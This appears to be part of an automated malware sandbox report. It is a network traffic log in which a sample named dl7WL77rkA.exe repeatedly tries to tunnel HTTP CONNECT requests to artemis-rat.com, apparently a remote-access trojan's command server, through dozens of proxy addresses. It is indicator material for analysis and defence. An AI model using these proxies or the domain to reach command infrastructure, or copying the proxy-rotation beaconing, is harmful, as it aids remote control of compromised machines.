                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.702265024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.092763901 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.405282974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.905210018 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.904978991 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136192.168.2.550208103.63.190.3780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.176321983 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.542819977 CET | 340 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137192.168.2.550322104.21.80.83803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.179914951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.334521055 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138192.168.2.550283184.178.172.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.204816103 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139192.168.2.550330104.19.109.209803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.205452919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.359724045 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140192.168.2.550329104.16.105.207803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.205738068 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.360162973 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141192.168.2.550335104.20.75.69803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.205743074 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.359771967 CET  316                IN         HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            142192.168.2.55027798.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.208151102 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
143         192.168.2.5  50340        104.16.81.76    80                3876  C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.212833881 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.367114067 CET  316                IN         HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
144         192.168.2.5  50312        162.241.6.97    60651             3876  C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.212836027 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.717333078 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.342380047 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.592461109 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.108496904 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
145         192.168.2.5  50233        43.155.142.116  15673             3876  C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.217350960 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
146         192.168.2.5  50255        46.226.148.105  36366             3876  C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.221811056 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.889219046 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
147         192.168.2.5  50350        188.114.99.37   80                3876  C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.231101990 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.385596991 CET  316                IN         HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
148         192.168.2.5  49715        154.12.253.232  52127             3876  C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.236437082 CET  223                OUT        CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.311126947 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.311610937 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.468137026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.514616013 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            149192.168.2.550243156.67.217.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.238276958 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.581748009 CET | 327 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            150192.168.2.550241103.199.18.248803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.240852118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.588706970 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 19
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            151192.168.2.550369172.67.182.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.246907949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.401428938 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            152192.168.2.550266176.99.2.4310813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.260572910 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.618627071 CET | 228 | IN | HTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            153192.168.2.55035112.186.205.120803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.260720968 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            154192.168.2.550270103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.266921043 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            155192.168.2.550387104.25.114.28803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.267153978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.422607899 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
156192.168.2.550235103.245.109.17280803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.293379068 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.076740980 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.869107008 CET  19  IN  HTTP/1.1 200 OK


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
157192.168.2.550334190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.294234037 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
158192.168.2.550219124.160.118.18380803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.295001030 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.693773031 CET  323  IN  HTTP/1.1 400 Bad Request
Server: nginx/1.8.1
Date: Mon, 11 Mar 2024 14:51:44 GMT
Content-Type: text/html
Content-Length: 172
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
159192.168.2.550244171.244.140.160240153876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.295208931 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
160192.168.2.550360146.19.106.42123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.297991991 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
